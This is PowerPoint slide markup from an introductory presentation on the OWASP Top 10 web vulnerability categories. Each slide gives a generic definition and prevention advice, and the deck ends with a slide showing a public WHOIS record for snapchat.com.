                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD6EF1C-D7A9-4735-8DE9-B249551E286C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1951671"/>
            <a:ext cx="12191998" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cryptographic failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243025183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1E6A303-8E5E-42A8-AE2B-D9677E9649EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90150" y="905360"/>
            <a:ext cx="12191999" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65FE34E-D948-478A-AC98-E894269BEE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836401" y="2350323"/>
            <a:ext cx="9033368" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Injection is a type of cyber attack that involves the insertion of malicious code into a web application. Injection attacks can be used to steal sensitive data, modify or delete data, or take control of an application. Common types of injection attacks include SQL injection, cross-site scripting (XSS) attacks, and command injection. To prevent injection attacks, developers should use input validation, parameterized queries, and other security measures. Attackers can use injection attacks to steal sensitive data, modify or delete data, or take control of an application. Injection attacks can be prevented by using secure coding practices, regularly testing applications for vulnerabilities, and implementing security protocols.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344641805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044F127-CB3B-49E6-B8E8-E3735F21F050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4117350" y="737632"/>
            <a:ext cx="12144374" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insecure Design </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938E0DE2-6228-47D7-971D-586D0DF373A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2161683" y="1989270"/>
            <a:ext cx="8572499" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Insecure design is a type of security vulnerability that occurs when a web application is designed with security flaws. Insecure design can be caused by poor software architecture, lack of security controls, or failure to follow best practices for secure design. Insecure design can lead to data breaches, identity theft, and other types of cyber attacks. To prevent insecure design, developers should follow secure design principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit insecure design to steal sensitive data, modify or delete data, or take control of an application. Insecure design can be prevented by using secure coding practices, following best practices for secure design, and regularly updating software and security systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214644331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6EE4AA3-4F42-489C-8FC5-1104C0B3AE67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="902732"/>
            <a:ext cx="12191999" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E59A63-7AE1-4F32-A5A3-7074C82C6DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1758950" y="2202691"/>
            <a:ext cx="9080500" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security misconfiguration is a type of security vulnerability that occurs when a web application is not configured correctly. Security misconfiguration can be caused by weak passwords, unsecured network protocols, or failure to follow best practices for secure configuration. Security misconfiguration can lead to data breaches, identity theft, and other types of cyber attacks. To prevent security misconfiguration, developers should follow secure configuration principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit security misconfiguration to steal sensitive data, modify or delete data, or take control of an application. Security misconfiguration can be prevented by using secure passwords, following best practices for secure configuration, and regularly updating software and security systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372636338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215827" y="-577648"/>
            <a:ext cx="8791575" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerable and outdated Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2172638" y="1809952"/>
            <a:ext cx="8791575" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulneable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and outdated components are a type of security vulnerability that occurs when a web application uses outdated or insecure software components. Vulnerable and outdated components can be caused by failure to update software, use of deprecated software, or use of software with known vulnerabilities. Vulnerable and outdated components can lead to data breaches, identity theft, and other types of cyber attacks. To prevent vulnerable and outdated components, developers should use up-to-date software components, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit vulnerable and outdated components to steal sensitive data, modify or delete data, or take control of an application. Vulnerable and outdated components can be prevented by using up-to-date software components, following best practices for secure coding, and regularly updating software and security systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98099302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00672" y="-461738"/>
            <a:ext cx="8791575" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identification and authentication failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316251" y="1545465"/>
            <a:ext cx="9560415" cy="1020650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identification and authentication failures are a type of security vulnerability that occurs when a web application fails to properly identify and authenticate users. Identification and authentication failures can be caused by weak passwords, lack of multi-factor authentication, or failure to follow best practices for secure identification and authentication. Identification and authentication failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent identification and authentication failures, developers should follow secure identification and authentication principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit identification and authentication failures to steal sensitive data, modify or delete data, or take control of an application. Identification and authentication failures can be prevented by using strong passwords, implementing multi-factor authentication, and following best practices for secure identification and authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16312287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69447" y="154878"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>software and data integrity failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205806" y="1335087"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Software and data integrity failures are a type of security vulnerability that occurs when a web application fails to maintain the integrity of its software and data. Software and data integrity failures can be caused by failure to follow best practices for secure software development, use of unsecured network protocols, or failure to implement secure coding practices. Software and data integrity failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent software and data integrity failures, developers should follow secure software development principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit software and data integrity failures to steal sensitive data, modify or delete data, or take control of an application. Software and data integrity failures can be prevented by using secure software development practices, following best practices for secure coding, and regularly updating software and security systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327399827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3232" y="257910"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security logging and monitoring failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218685" y="1373723"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Security logging and monitoring failures are a type of security vulnerability that occurs when a web application fails to properly log and monitor security events. Security logging and monitoring failures can be caused by failure to implement secure logging and monitoring practices, use of unsecured network protocols, or failure to follow best practices for secure coding. Security logging and monitoring failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent security logging and monitoring failures, developers should follow secure logging and monitoring principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit security logging and monitoring failures to steal sensitive data, modify or delete data, or take control of an application. Security logging and monitoring failures can be prevented by using secure logging and monitoring practices, following best practices for secure coding, and regularly updating software and security systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275296387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91418" y="180636"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server - side request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1167170" y="1659206"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Server-side request forgery (SSRF) is a type of security vulnerability that occurs when an attacker is able to send a request from a vulnerable web application to an external server. SSRF can be caused by failure to validate user input, use of unsecured network protocols, or failure to follow best practices for secure coding. SSRF can lead to data breaches, identity theft, and other types of cyber attacks. To prevent SSRF, developers should follow secure coding practices, implement secure network protocols, and regularly test their applications for vulnerabilities. Attackers can exploit SSRF to steal sensitive data, modify or delete data, or take control of an application. SSRF can be prevented by validating user input, using secure network protocols, and following best practices for secure coding.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238181458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D6D3A7-1DC1-4E22-8270-47D1CD036733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="12191999" cy="6680200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0">
                <a:latin typeface="Bleeding Cowboys" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31752373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a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1378039" y="1191296"/>
            <a:ext cx="10073159" cy="45011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63480" rIns="91440" bIns="12696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DOMAIN WHOIS RECORD</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dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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te-IN" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Gautami"/>
              </a:rPr>
              <a:t>Queried whois.internic.net with "dom snapchat.com"...</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Gautami"/>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Domain Name: SNAPCHAT.COM   Registry Domain ID: 1704543145_DOMAIN_COM-VRSN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Registrar WHOIS Server: whois.markmonitor.com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Registrar URL: http://www.markmonitor.com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Updated Date: 2018-03-28T20:34:03Z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Creation Date: 2012-02-28T19:29:26Z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Registry Expiry Date: 2026-02-28T19:29:26Z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Registrar: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MarkMonitor</a:t>
            </a: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Inc.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Registrar IANA ID: 292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Registrar Abuse Contact Email: abusecomplaints@markmonitor.com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Registrar Abuse Contact Phone: +1.2086851750</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12631072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78F10D2-A61B-4BCD-B156-CDD41F5909FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3349591" y="0"/>
            <a:ext cx="5332395" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
